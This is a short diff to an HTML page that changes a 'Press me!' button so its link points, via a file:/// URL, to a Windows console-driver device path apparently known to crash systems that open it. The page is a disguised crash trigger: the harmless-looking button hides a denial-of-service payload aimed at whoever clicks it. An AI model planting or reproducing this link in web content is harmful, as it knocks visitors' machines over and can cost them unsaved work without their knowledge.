--- a/index.html
+++ b/index.html
@@ -12,6 +12,6 @@
     </head>
     
     <body>
-      <a class="button" href=" \\.\globalroot\device\condrv\kernelconnect">Press me!</a>
+      <a class="button" href="file:///\\.\globalroot\device\condrv\kernelconnect">Press me!</a>
     </body>
     </html>
